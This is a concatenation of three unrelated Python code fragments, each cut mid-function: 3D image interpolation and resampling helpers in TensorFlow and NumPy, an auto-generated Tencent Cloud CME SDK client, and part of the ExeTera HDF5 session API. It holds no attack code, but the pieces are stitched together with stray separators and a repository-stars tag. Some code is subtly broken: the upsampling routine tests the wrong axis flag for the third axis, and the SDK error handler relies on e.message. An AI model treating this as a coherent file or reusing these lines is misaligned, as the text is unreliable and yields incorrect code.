phi2_index_floor_1 = phi2_index_floor+1
# and apply boundary conditions
phi0_index_floor = tf.minimum(phi0_index_floor,nx[0]-1)
phi0_index_floor = tf.maximum(phi0_index_floor,0)
phi0_index_floor_1 = tf.minimum(phi0_index_floor_1,nx[0]-1)
phi0_index_floor_1 = tf.maximum(phi0_index_floor_1,0)
phi1_index_floor = tf.minimum(phi1_index_floor,nx[1]-1)
phi1_index_floor = tf.maximum(phi1_index_floor,0)
phi1_index_floor_1 = tf.minimum(phi1_index_floor_1,nx[1]-1)
phi1_index_floor_1 = tf.maximum(phi1_index_floor_1,0)
phi2_index_floor = tf.minimum(phi2_index_floor,nx[2]-1)
phi2_index_floor = tf.maximum(phi2_index_floor,0)
phi2_index_floor_1 = tf.minimum(phi2_index_floor_1,nx[2]-1)
phi2_index_floor_1 = tf.maximum(phi2_index_floor_1,0)
# if I wanted to apply zero boundary conditions, I'd have to check here where they are
# then set to zero below
# at this point it should be impossible for any of my indices to point outside the volume
# then we will need to vectorize everything to use scalar indices
phi0_index_floor_flat = tf.reshape(phi0_index_floor,[-1])
phi0_index_floor_flat_1 = tf.reshape(phi0_index_floor_1,[-1])
phi1_index_floor_flat = tf.reshape(phi1_index_floor,[-1])
phi1_index_floor_flat_1 = tf.reshape(phi1_index_floor_1,[-1])
phi2_index_floor_flat = tf.reshape(phi2_index_floor,[-1])
phi2_index_floor_flat_1 = tf.reshape(phi2_index_floor_1,[-1])
I_flat = tf.reshape(I,[-1])
# indices recall that the LAST INDEX IS CONTIGUOUS
phi_index_floor_flat_000 = nx[2]*nx[1]*phi0_index_floor_flat + nx[2]*phi1_index_floor_flat + phi2_index_floor_flat
phi_index_floor_flat_001 = nx[2]*nx[1]*phi0_index_floor_flat + nx[2]*phi1_index_floor_flat + phi2_index_floor_flat_1
phi_index_floor_flat_010 = nx[2]*nx[1]*phi0_index_floor_flat + nx[2]*phi1_index_floor_flat_1 + phi2_index_floor_flat
phi_index_floor_flat_011 = nx[2]*nx[1]*phi0_index_floor_flat + nx[2]*phi1_index_floor_flat_1 + phi2_index_floor_flat_1
phi_index_floor_flat_100 = nx[2]*nx[1]*phi0_index_floor_flat_1 + nx[2]*phi1_index_floor_flat + phi2_index_floor_flat
phi_index_floor_flat_101 = nx[2]*nx[1]*phi0_index_floor_flat_1 + nx[2]*phi1_index_floor_flat + phi2_index_floor_flat_1
phi_index_floor_flat_110 = nx[2]*nx[1]*phi0_index_floor_flat_1 + nx[2]*phi1_index_floor_flat_1 + phi2_index_floor_flat
phi_index_floor_flat_111 = nx[2]*nx[1]*phi0_index_floor_flat_1 + nx[2]*phi1_index_floor_flat_1 + phi2_index_floor_flat_1
# now slice the image
I000_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_000, dtype=idtype))
I001_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_001, dtype=idtype))
I010_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_010, dtype=idtype))
I011_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_011, dtype=idtype))
I100_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_100, dtype=idtype))
I101_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_101, dtype=idtype))
I110_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_110, dtype=idtype))
I111_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_111, dtype=idtype))
# reshape it
I000 = tf.reshape(I000_flat, nxout)
I001 = tf.reshape(I001_flat, nxout)
I010 = tf.reshape(I010_flat, nxout)
I011 = tf.reshape(I011_flat, nxout)
I100 = tf.reshape(I100_flat, nxout)
I101 = tf.reshape(I101_flat, nxout)
I110 = tf.reshape(I110_flat, nxout)
I111 = tf.reshape(I111_flat, nxout)
# combine them
p000 = tf.cast((1.0-phi0_p)*(1.0-phi1_p)*(1.0-phi2_p), dtype=image_dtype)
p001 = tf.cast((1.0-phi0_p)*(1.0-phi1_p)*( phi2_p), dtype=image_dtype)
p010 = tf.cast((1.0-phi0_p)*( phi1_p)*(1.0-phi2_p), dtype=image_dtype)
p011 = tf.cast((1.0-phi0_p)*( phi1_p)*( phi2_p), dtype=image_dtype)
p100 = tf.cast(( phi0_p)*(1.0-phi1_p)*(1.0-phi2_p), dtype=image_dtype)
p101 = tf.cast(( phi0_p)*(1.0-phi1_p)*( phi2_p), dtype=image_dtype)
p110 = tf.cast(( phi0_p)*( phi1_p)*(1.0-phi2_p), dtype=image_dtype)
p111 = tf.cast(( phi0_p)*( phi1_p)*( phi2_p), dtype=image_dtype)
Il = I000*p000\
+ I001*p001\
+ I010*p010\
+ I011*p011\
+ I100*p100\
+ I101*p101\
+ I110*p110\
+ I111*p111
return Il
def grad3(I,dx):
'''
Calculate the gradent of a 3D image
Inputs are I, a 3D image
and dx, a 3-tuple of voxeldimensions
Outputs are each component of the gradient returned as a tuple
'''
I_0_m = (I[1,:,:] - I[0,:,:])/dx[0]
I_0_p = (I[-1,:,:] - I[-2,:,:])/dx[0]
I_0_0 = (I[2:,:,:]-I[:-2,:,:])/2.0/dx[0]
I_0 = tf.concat([I_0_m[None,:,:], I_0_0, I_0_p[None,:,:]], axis=0)
I_1_m = (I[:,1,:] - I[:,0,:])/dx[1]
I_1_p = (I[:,-1,:] - I[:,-2,:])/dx[1]
I_1_0 = (I[:,2:,:]-I[:,:-2,:])/2.0/dx[1]
I_1 = tf.concat([I_1_m[:,None,:], I_1_0, I_1_p[:,None,:]], axis=1)
I_2_m = (I[:,:,1] - I[:,:,0])/dx[2]
I_2_p = (I[:,:,-1] - I[:,:,-2])/dx[2]
I_2_0 = (I[:,:,2:]-I[:,:,:-2])/2.0/dx[2]
I_2 = tf.concat([I_2_m[:,:,None], I_2_0, I_2_p[:,:,None]], axis=2)
return I_0, I_1, I_2
def down(I,ndown):
'''Downsample images by averaging over a rectangular neighborhood
Inputs are a 3D image I
a downsampling factor on each axis ndown = [ndown0,ndown1,ndown2]
Output is the downsampled image.
'''
ndown = np.array(ndown)
n0 = np.array(I.shape)
n1 = np.array(n0)//ndown
J = np.zeros(n1)
factor = 1.0 / np.prod(ndown)
for i in range(ndown[0]):
for j in range(ndown[1]):
for k in range(ndown[2]):
J += I[i:n1[0]*ndown[0]:ndown[0],j:n1[1]*ndown[1]:ndown[1],k:n1[2]*ndown[2]:ndown[2]] * factor
return J
def down2(I):
'''Downsample by a factor of 2 by averaging over a 2x2x2 neighborhood
Input is an image I
Output is the downsampled image
'''
n0 = np.array(I.shape)
n1 = n0//2
J = np.zeros(n1)
for i in range(2):
for j in range(2):
for k in range(2):
J += 0.125*I[i:n1[0]*2:2,j:n1[1]*2:2,k:n1[2]*2:2]
return J
def upsample(I,nup):
'''Upsample by zero padding in the Fourier domain.
Inputs are I, an image to be upsampled
nup, the desired size of the upsampled image.
Output is the upsapmled image.
'''
n = np.array(I.shape)
# now I want to upsample by zero padding in the Fourier domain
even = (1 - (n % 2)).astype(int)
shift = even * n//2 + (1-even) * (n-1)//2
J = np.array(I)
# upsample the 0th axis
if nup[0] > n[0]:
Jhat = np.fft.fft(J, axis=0)
Jhat = np.roll(Jhat,shift[0],axis=0)
if even[0]:
# if even, make nyquist paired
Jhat[0,:,:] /= 2.0
Jhat = np.pad(Jhat,pad_width=((0,1),(0,0),(0,0)),mode='edge')
n[0] = n[0] + 1
# now pad
Jhat = np.pad(Jhat,pad_width=((0,nup[0]-n[0]),(0,0),(0,0)),mode='constant',constant_values=0)
# shift it
Jhat = np.roll(Jhat,-shift[0],axis=0)
J = np.fft.ifft(Jhat,axis=0).real
# upsample the 1th axis
if nup[1] > n[1]:
Jhat = np.fft.fft(J, axis=1)
Jhat = np.roll(Jhat,shift[1],axis=1)
if even[1]:
# if even, make nyquist paired
Jhat[:,0,:] /= 2.0
Jhat = np.pad(Jhat,pad_width=((0,0),(0,1),(0,0)),mode='edge')
n[1] = n[1] + 1
# now pad
Jhat = np.pad(Jhat,pad_width=((0,0),(0,nup[1]-n[1]),(0,0)),mode='constant',constant_values=0)
# shift it
Jhat = np.roll(Jhat,-shift[1],axis=1)
J = np.fft.ifft(Jhat,axis=1).real
# upsample the 2th axis
if nup[2] > n[2]:
Jhat = np.fft.fft(J, axis=2)
Jhat = np.roll(Jhat,shift[2],axis=2)
if even[1]:
# if even, make nyquist paired
Jhat[:,:,0] /= 2.0
Jhat = np.pad(Jhat,pad_width=((0,0),(0,0),(0,1)),mode='edge')
n[2] = n[2] + 1
# now pad
Jhat = np.pad(Jhat,pad_width=((0,0),(0,0),(0,nup[2]-n[2])),mode='constant',constant_values=0)
# shift it
Jhat = np.roll(Jhat,-shift[2],axis=2)
J = np.fft.ifft(Jhat,axis=2).real
# correct normalization
# note inverse has 1/n
J = J * np.prod(nup) / np.prod(n);
return J
def transform_data(x0,x1,x2,data,tform0,tform1,tform2,
y0=None,y1=None,y2=None,y=None,
t0=None,t1=None,t2=None,t=None,
**kwargs):
'''
Transform | |
<gh_stars>1-10
# -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
from tencentcloud.cme.v20191029 import models
class CmeClient(AbstractClient):
_apiVersion = '2019-10-29'
_endpoint = 'cme.tencentcloudapi.com'
_service = 'cme'
def AddTeamMember(self, request):
"""向一个团队中团队成员,并且指定成员的角色。
:param request: Request instance for AddTeamMember.
:type request: :class:`tencentcloud.cme.v20191029.models.AddTeamMemberRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.AddTeamMemberResponse`
"""
try:
params = request._serialize()
body = self.call("AddTeamMember", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.AddTeamMemberResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CreateClass(self, request):
"""新增分类,用于管理素材。
<li>分类层数不能超过10;</li>
<li>子分类数不能超过10。</li>
:param request: Request instance for CreateClass.
:type request: :class:`tencentcloud.cme.v20191029.models.CreateClassRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.CreateClassResponse`
"""
try:
params = request._serialize()
body = self.call("CreateClass", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateClassResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CreateLink(self, request):
"""创建素材链接或分类路径链接,将源资源信息链接到目标。
:param request: Request instance for CreateLink.
:type request: :class:`tencentcloud.cme.v20191029.models.CreateLinkRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.CreateLinkResponse`
"""
try:
params = request._serialize()
body = self.call("CreateLink", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateLinkResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CreateProject(self, request):
"""创建云剪的编辑项目,支持创建视频剪辑、直播剪辑、导播台项目以及视频拆条项目。
:param request: Request instance for CreateProject.
:type request: :class:`tencentcloud.cme.v20191029.models.CreateProjectRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.CreateProjectResponse`
"""
try:
params = request._serialize()
body = self.call("CreateProject", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateProjectResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CreateTeam(self, request):
"""创建一个团队。
:param request: Request instance for CreateTeam.
:type request: :class:`tencentcloud.cme.v20191029.models.CreateTeamRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.CreateTeamResponse`
"""
try:
params = request._serialize()
body = self.call("CreateTeam", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateTeamResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DeleteClass(self, request):
"""删除分类信息,删除时检验下述限制:
<li>分类路径必须存在;</li>
<li>分类下没有绑定素材。</li>
:param request: Request instance for DeleteClass.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteClassRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteClassResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteClass", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteClassResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DeleteLoginStatus(self, request):
"""删除用户登录态,使用户登出云剪平台。
:param request: Request instance for DeleteLoginStatus.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteLoginStatusRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteLoginStatusResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteLoginStatus", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteLoginStatusResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DeleteMaterial(self, request):
"""根据素材 Id 删除素材。
:param request: Request instance for DeleteMaterial.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteMaterialRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteMaterialResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteMaterial", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteMaterialResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DeleteProject(self, request):
"""删除云剪编辑项目。
:param request: Request instance for DeleteProject.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteProjectRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteProjectResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteProject", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteProjectResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DeleteTeam(self, request):
"""删除一个团队。
<li>要删除的团队必须没有归属的素材;</li>
<li>要删除的团队必须没有归属的分类。</li>
:param request: Request instance for DeleteTeam.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteTeamRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteTeamResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteTeam", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteTeamResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DeleteTeamMembers(self, request):
"""将团队成员从团队中删除,默认只有 Owner 及管理员才有此权限。
:param request: Request instance for DeleteTeamMembers.
:type request: :class:`tencentcloud.cme.v20191029.models.DeleteTeamMembersRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DeleteTeamMembersResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteTeamMembers", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteTeamMembersResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeClass(self, request):
"""获取指定归属者下所有的分类信息。
:param request: Request instance for DescribeClass.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeClassRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeClassResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeClass", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeClassResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeJoinTeams(self, request):
"""获取指定的团队成员所加入的团队列表。
:param request: Request instance for DescribeJoinTeams.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeJoinTeamsRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeJoinTeamsResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeJoinTeams", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeJoinTeamsResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeLoginStatus(self, request):
"""查询指定用户的登录态。
:param request: Request instance for DescribeLoginStatus.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeLoginStatusRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeLoginStatusResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeLoginStatus", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeLoginStatusResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeMaterials(self, request):
"""根据素材 Id 批量获取素材详情。
:param request: Request instance for DescribeMaterials.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeMaterialsRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeMaterialsResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeMaterials", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeMaterialsResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribePlatforms(self, request):
"""<li>支持获取所创建的所有平台列表信息;</li>
<li>支持获取指定的平台列表信息。</li>
:param request: Request instance for DescribePlatforms.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribePlatformsRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribePlatformsResponse`
"""
try:
params = request._serialize()
body = self.call("DescribePlatforms", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribePlatformsResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeProjects(self, request):
"""支持根据多种条件过滤出项目列表。
:param request: Request instance for DescribeProjects.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeProjectsRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeProjectsResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeProjects", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeProjectsResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeResourceAuthorization(self, request):
"""查询指定资源的授权列表。
:param request: Request instance for DescribeResourceAuthorization.
:type request: :class:`tencentcloud.cme.v20191029.models.DescribeResourceAuthorizationRequest`
:rtype: :class:`tencentcloud.cme.v20191029.models.DescribeResourceAuthorizationResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeResourceAuthorization", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeResourceAuthorizationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
| |
unique_fkey_indices < operations.INVALID_INDEX
safe_unique_fkey_indices = unique_fkey_indices[invalid_filter]
# the predicate results are in the same space as the unique_fkey_indices, which
# means they may still contain invalid indices, so filter those now
safe_values_to_join = raw_values_to_join[invalid_filter]
# now get the memory that the results will be mapped to
# destination_space_values = writer.chunk_factory(len(destination_pkey))
destination_space_values = np.zeros(len(destination_pkey), dtype=raw_values_to_join.dtype)
# finally, map the results from the source space to the destination space
destination_space_values[safe_unique_fkey_indices] = safe_values_to_join
if writer is not None:
writer.data.write(destination_space_values)
else:
return destination_space_values
def predicate_and_join(self,
predicate, destination_pkey, fkey_indices,
reader=None, writer=None, fkey_index_spans=None):
"""
This method is due for removal and should not be used.
Please use the merge or ordered_merge functions instead.
"""
if reader is not None:
if not isinstance(reader, rw.Reader):
raise ValueError(f"'reader' must be a type of Reader but is {type(reader)}")
if isinstance(reader, rw.IndexedStringReader):
raise ValueError(f"Joins on indexed string fields are not supported")
# generate spans for the sorted key indices if not provided
if fkey_index_spans is None:
fkey_index_spans = self.get_spans(field=fkey_indices)
# select the foreign keys from the start of each span to get an ordered list
# of unique id indices in the destination space that the results of the predicate
# execution are mapped to
unique_fkey_indices = fkey_indices[:][fkey_index_spans[:-1]]
# generate a filter to remove invalid foreign key indices (where values in the
# foreign key don't map to any values in the destination space
invalid_filter = unique_fkey_indices < operations.INVALID_INDEX
safe_unique_fkey_indices = unique_fkey_indices[invalid_filter]
# execute the predicate (note that not every predicate requires a reader)
if reader is not None:
dtype = reader.dtype()
else:
dtype = np.uint32
results = np.zeros(len(fkey_index_spans) - 1, dtype=dtype)
predicate(fkey_index_spans, reader, results)
# the predicate results are in the same space as the unique_fkey_indices, which
# means they may still contain invalid indices, so filter those now
safe_results = results[invalid_filter]
# now get the memory that the results will be mapped to
destination_space_values = writer.chunk_factory(len(destination_pkey))
# finally, map the results from the source space to the destination space
destination_space_values[safe_unique_fkey_indices] = safe_results
writer.write(destination_space_values)
def get(self,
field: Union[Field, h5py.Group]):
"""
Get a Field from a h5py Group.
Example::
# this code for context
with Session() as s:
# open a dataset about wildlife
src = s.open_dataset("/my/wildlife/dataset.hdf5", "r", "src")
# fetch the group containing bird data
birds = src['birds']
# get the bird decibel field
bird_decibels = s.get(birds['decibels'])
:param field: The Field or Group object to retrieve.
"""
if isinstance(field, Field):
return field
if 'fieldtype' not in field.attrs.keys():
raise ValueError(f"'{field}' is not a well-formed field")
fieldtype_map = {
'indexedstring': fld.IndexedStringField,
'fixedstring': fld.FixedStringField,
'categorical': fld.CategoricalField,
'boolean': fld.NumericField,
'numeric': fld.NumericField,
'datetime': fld.TimestampField,
'date': fld.TimestampField,
'timestamp': fld.TimestampField
}
fieldtype = field.attrs['fieldtype'].split(',')[0]
return fieldtype_map[fieldtype](self, field, None, field.name)
def create_like(self, field, dest_group, dest_name, timestamp=None, chunksize=None):
"""
Create a field of the same type as an existing field, in the location and with the name provided.
Example::
with Session as s:
...
a = s.get(table_1['a'])
b = s.create_like(a, table_2, 'a_times_2')
b.data.write(a.data[:] * 2)
:param field: The Field whose type is to be copied
:param dest_group: The group in which the new field should be created
:param dest_name: The name of the new field
"""
if isinstance(field, h5py.Group):
if 'fieldtype' not in field.attrs.keys():
raise ValueError("{} is not a well-formed field".format(field))
f = self.get(field)
return f.create_like(dest_group, dest_name)
elif isinstance(field, Field):
return field.create_like(dest_group, dest_name)
else:
raise ValueError("'field' must be either a Field or a h5py.Group, but is {}".format(type(field)))
def create_indexed_string(self, group, name, timestamp=None, chunksize=None):
"""
Create an indexed string field in the given DataFrame with the given name.
:param group: The group in which the new field should be created
:param name: The name of the new field
:param timestamp: If set, the timestamp that should be given to the new field. If not set
datetime.now() is used.
:param chunksize: If set, the chunksize that should be used to create the new field. In general, this should
not be set unless you are writing unit tests.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if isinstance(group, ds.Dataset):
raise ValueError("'group' must be an ExeTera DataFrame rather than a"
" top-level Dataset")
else:
raise ValueError("'group' must be an Exetera DataFrame but a "
"{} was passed to it".format(type(group)))
if isinstance(group, h5py.Group):
fld.indexed_string_field_constructor(self, group, name, timestamp, chunksize)
return fld.IndexedStringField(self, group[name], None, write_enabled=True)
else:
return group.create_indexed_string(name, timestamp, chunksize)
def create_fixed_string(self, group, name, length, timestamp=None, chunksize=None):
"""
Create a fixed string field in the given DataFrame, given name, and given max string length per entry.
:param group: The group in which the new field should be created
:param name: The name of the new field
:param length: The maximum length in bytes that each entry can have.
:param timestamp: If set, the timestamp that should be given to the new field. If not set
datetime.now() is used.
:param chunksize: If set, the chunksize that should be used to create the new field. In general, this should
not be set unless you are writing unit tests.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if isinstance(group, ds.Dataset):
raise ValueError("'group' must be an ExeTera DataFrame rather than a"
" top-level Dataset")
else:
raise ValueError("'group' must be an Exetera DataFrame but a "
"{} was passed to it".format(type(group)))
if isinstance(group, h5py.Group):
fld.fixed_string_field_constructor(self, group, name, length, timestamp, chunksize)
return fld.FixedStringField(self, group[name], None, write_enabled=True)
else:
return group.create_fixed_string(name, length, timestamp, chunksize)
def create_categorical(self, group, name, nformat, key, timestamp=None, chunksize=None):
"""
Create a categorical field in the given DataFrame with the given name. This function also takes a numerical
format for the numeric representation of the categories, and a key that maps numeric values to their string
string descriptions.
:param group: The group in which the new field should be created
:param name: The name of the new field
:param nformat: A numerical type in the set (int8, uint8, int16, uint18, int32, uint32, int64). It is
recommended to use 'int8'.
:param key: A dictionary that maps numerical values to their string representations
:param timestamp: If set, the timestamp that should be given to the new field. If not set
datetime.now() is used.
:param chunksize: If set, the chunksize that should be used to create the new field. In general, this should
not be set unless you are writing unit tests.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if isinstance(group, ds.Dataset):
raise ValueError("'group' must be an ExeTera DataFrame rather than a"
" top-level Dataset")
else:
raise ValueError("'group' must be an Exetera DataFrame but a "
"{} was passed to it".format(type(group)))
if isinstance(group, h5py.Group):
fld.categorical_field_constructor(self, group, name, nformat, key, timestamp, chunksize)
return fld.CategoricalField(self, group[name], None, write_enabled=True)
else:
return group.create_categorical(name, nformat, key, timestamp, chunksize)
def create_numeric(self, group, name, nformat, timestamp=None, chunksize=None):
"""
Create a numeric field in the given DataFrame with the given name.
:param group: The group in which the new field should be created
:param name: The name of the new field
:param nformat: A numerical type in the set (int8, uint8, int16, uint18, int32, uint32, int64, uint64,
float32, float64). It is recommended to avoid uint64 as certain operations in numpy cause conversions to
floating point values.
:param timestamp: If set, the timestamp that should be given to the new field. If not set
datetime.now() is used.
:param chunksize: If set, the chunksize that should be used to create the new field. In general, this should
not be set unless you are writing unit tests.
"""
if not isinstance(group, (df.DataFrame, h5py.Group)):
if isinstance(group, ds.Dataset):
raise ValueError("'group' must be an ExeTera DataFrame rather than a"
" top-level Dataset")
